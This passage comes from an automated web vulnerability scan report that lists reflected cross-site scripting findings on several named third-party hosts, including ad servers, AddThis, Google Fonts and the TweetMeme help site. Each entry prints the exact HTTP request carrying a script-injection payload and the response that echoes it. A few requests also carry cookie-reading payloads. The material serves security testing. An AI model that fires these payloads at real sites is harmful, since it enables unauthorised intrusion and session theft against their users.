Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8295a"><script>alert(1)</script>ab128e6cc17 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX8295a"><script>alert(1)</script>ab128e6cc17/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660; session=1295919344|1295919348; dlx_7d=set

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:32:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX8295a"><script>alert(1)</script>ab128e6cc17/473984052/x94/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.79. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0658"><script>alert(1)</script>c1c3d6e2b7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/@x94d0658"><script>alert(1)</script>c1c3d6e2b7 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660; session=1295919344|1295919348; dlx_7d=set

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:32:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 321
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/653717829/x94d0658"><script>alert(1)</script>c1c3d6e2b7/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG S
...[SNIP]...

4.80. http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.abbreviations.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a0a26<script>alert(1)</script>d00f3446e86 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.abbreviations.com/p.json?callback=_ate.ad.hpra0a26<script>alert(1)</script>d00f3446e86&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F32&po6wxt HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%7D..1295452270.19F|1295378586.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 391
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 24 Jan 2011 21:59:41 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 23 Feb 2011 21:59:41 GMT; Path=/
Set-Cookie: di=%7B%7D..1295452270.19F|1295906381.60|1293848200.66; Domain=.addthis.com; Expires=Wed, 23-Jan-2013 11:56:43 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 24 Jan 2011 21:59:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 21:59:41 GMT
Connection: close

_ate.ad.hpra0a26<script>alert(1)</script>d00f3446e86({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.abbreviations.com%2fbs.aspx%3fst%3db1.aspx51536%253Cscript%253Ealert
...[SNIP]...

4.81. http://ds.addthis.com/red/psi/sites/www3.whdh.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www3.whdh.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ff7e4<script>alert(1)</script>21aaae9acf7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www3.whdh.com/p.json?callback=_ate.ad.hprff7e4<script>alert(1)</script>21aaae9acf7&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww3.whdh.com%2Fmobile%2Fphoneforecast%2Fsettings.php%2F5bebc%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eb51006e4a2e&ref=http%3A%2F%2Fburp%2Fshow%2F48&tb1nil HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; psc=4; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295903322.60|1295452270.19F|1293848200.66; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 25 Jan 2011 04:29:55 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 24 Feb 2011 04:29:55 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 25 Jan 2011 04:29:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:29:55 GMT
Connection: close

_ate.ad.hprff7e4<script>alert(1)</script>21aaae9acf7({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg=="})

4.82. https://fonts.googleapis.com/css [family parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://fonts.googleapis.com
Path:   /css

Issue detail

The value of the family request parameter is copied into the HTML document as plain text between tags. The payload b4d14<script>alert(1)</script>9fc417d1dbb was submitted in the family parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css?family=Cantarellb4d14<script>alert(1)</script>9fc417d1dbb HTTP/1.1
Host: fonts.googleapis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=UTF-8
Expires: Mon, 24 Jan 2011 15:11:56 GMT
Date: Mon, 24 Jan 2011 15:11:56 GMT
Cache-Control: private, max-age=86400
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

/* Cantarellb4d14<script>alert(1)</script>9fc417d1dbb (style: normal, weight: 400) is not available */
/* Not supported. */

4.83. http://help.tweetmeme.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5332"><script>alert(1)</script>43dac7f67f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5332\"><script>alert(1)</script>43dac7f67f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a5332"><script>alert(1)</script>43dac7f67f9=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=hvs2d5cp30e1hj10sbqrkjr2v4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/?a5332\"><script>alert(1)</script>43dac7f67f9=1"/>
...[SNIP]...

4.84. http://help.tweetmeme.com/2009/04/07/api-documentation/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/07/api-documentation/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fd1e"><script>alert(1)</script>1c4a5b86e64 was submitted in the REST URL parameter 4. This input was echoed as 3fd1e\"><script>alert(1)</script>1c4a5b86e64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04/07/api-documentation3fd1e"><script>alert(1)</script>1c4a5b86e64/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:05:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=cmb3lt8g6m025676m7qpv6hnf2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:05:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/2009/04/07/api-documentation3fd1e\"><script>alert(1)</script>1c4a5b86e64/"/>
...[SNIP]...

4.85. http://help.tweetmeme.com/2009/04/07/api-documentation/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/07/api-documentation/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12e07"><script>alert(1)</script>ffe8af704e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12e07\"><script>alert(1)</script>ffe8af704e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04/07/api-documentation/?12e07"><script>alert(1)</script>ffe8af704e4=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=trme8mis9vb1hpv99lfq46a903; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/2009/04/07/api-documentation/?12e07\"><script>alert(1)</script>ffe8af704e4=1"/>
...[SNIP]...

4.86. http://help.tweetmeme.com/2009/04/09/rss-feeds/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/09/rss-feeds/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 228c5"><script>alert(1)</script>c8bff7fe0f0 was submitted in the REST URL parameter 4. This input was echoed as 228c5\"><script>alert(1)</script>c8bff7fe0f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04/09/rss-feeds228c5"><script>alert(1)</script>c8bff7fe0f0/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:05:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=jgu7690q9kkdm0pmlen86vtk86; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:05:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/2009/04/09/rss-feeds228c5\"><script>alert(1)</script>c8bff7fe0f0/"/>
...[SNIP]...

4.87. http://help.tweetmeme.com/2009/04/09/rss-feeds/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/09/rss-feeds/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 189b3"><script>alert(1)</script>cebdedbe062 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 189b3\"><script>alert(1)</script>cebdedbe062 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04/09/rss-feeds/?189b3"><script>alert(1)</script>cebdedbe062=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6nm3s8c2m6kieo9c2js0pht791; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/2009/04/09/rss-feeds/?189b3\"><script>alert(1)</script>cebdedbe062=1"/>
...[SNIP]...

4.88. http://help.tweetmeme.com/2009/04/09/twitter-feeds/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/09/twitter-feeds/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f3e0"><script>alert(1)</script>71466c94826 was submitted in the REST URL parameter 4. This input was echoed as 3f3e0\"><script>alert(1)</script>71466c94826 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04/09/twitter-feeds3f3e0"><script>alert(1)</script>71466c94826/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:05:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=u5kr3ba81i5sui0lphbs8feco5; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:05:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/2009/04/09/twitter-feeds3f3e0\"><script>alert(1)</script>71466c94826/"/>
...[SNIP]...

4.89. http://help.tweetmeme.com/2009/04/09/twitter-feeds/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/09/twitter-feeds/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45199"><script>alert(1)</script>8351f254324 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45199\"><script>alert(1)</script>8351f254324 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04/09/twitter-feeds/?45199"><script>alert(1)</script>8351f254324=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=o74s3arn6v70f5unk3j55pvs93; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/2009/04/09/twitter-feeds/?45199\"><script>alert(1)</script>8351f254324=1"/>
...[SNIP]...

4.90. http://help.tweetmeme.com/contact/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /contact/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0028"><script>alert(1)</script>fea05a9ad68 was submitted in the REST URL parameter 1. This input was echoed as f0028\"><script>alert(1)</script>fea05a9ad68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contactf0028"><script>alert(1)</script>fea05a9ad68/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:03:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dnv19aatav99j4f9pibtsp58n3; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:03:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/contactf0028\"><script>alert(1)</script>fea05a9ad68/"/>
...[SNIP]...

4.91. http://help.tweetmeme.com/contact/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1468f"><script>alert(1)</script>2890b963226 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1468f\"><script>alert(1)</script>2890b963226 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/?1468f"><script>alert(1)</script>2890b963226=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=vveg4dunt1reusi70esr0se9h5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/contact/?1468f\"><script>alert(1)</script>2890b963226=1"/>
...[SNIP]...

4.92. http://help.tweetmeme.com/faq [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /faq

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c426a"><script>alert(1)</script>ab1b8766548 was submitted in the REST URL parameter 1. This input was echoed as c426a\"><script>alert(1)</script>ab1b8766548 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faqc426a"><script>alert(1)</script>ab1b8766548 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:05:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6qomn42q02ru80d09qgl5bm125; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:05:20 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/faqc426a\"><script>alert(1)</script>ab1b8766548"/>
...[SNIP]...

4.93. http://help.tweetmeme.com/forum [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /forum

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe3d"><script>alert(1)</script>faac14f3f1a was submitted in the REST URL parameter 1. This input was echoed as ebe3d\"><script>alert(1)</script>faac14f3f1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forumebe3d"><script>alert(1)</script>faac14f3f1a HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:03:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=7rhr8ug8ulb1snerfp4d9dq5f5; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:03:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/forumebe3d\"><script>alert(1)</script>faac14f3f1a"/>
...[SNIP]...

4.94. http://help.tweetmeme.com/forum [name of an arbitrarily supplied request parameter]

Summary

